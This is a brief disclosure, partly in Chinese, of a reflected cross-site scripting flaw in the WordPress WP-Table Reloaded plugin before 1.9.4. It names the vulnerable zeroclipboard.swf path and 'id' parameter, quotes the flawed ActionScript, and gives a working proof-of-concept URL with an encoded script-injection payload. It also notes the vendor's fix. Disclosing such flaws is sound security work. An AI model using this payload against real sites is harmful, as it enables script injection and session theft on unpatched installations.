作者: hip [Insight-Labs]
联系方式: hip@insight-labs.org | Website: http://insight-labs.org
软件地址: http://downloads.wordpress.org/plugin/wp-table-reloaded.latest-stable.zip
开发这网站: http://tobias.baethge.com/
影响版本: 1.9.4 before
简介:
WP -Table Reloaded enables you to create and manage tables,
without having to write HTML code, and it adds valuable functions for your visitors.
————————————————————————————————————————-
# XSS – Proof Of Concept:
vulnerable path:
/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf
vulnerabile parameter:id
piece of code:
flashvars = LoaderInfo(this.root.loaderInfo).parameters;
this.domId = flashvars.id; <– vulnerable input
ExternalInterface.call([ZeroClipboard.dispatch], domId, [mouseOver], null); <- vulnerable call
POC:
www.2cto.com /wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=a\%22%29%29}catch%28e%29{alert%281%29}//
————————————————————————————————————————-
路线图
– Vendor released version 1.9.4 on 27/01/2013 Fixed the bug
————————————————————————————————————————-
查看更多关于WordPress wp-table-reloaded‏ plugin XSS的详细内容...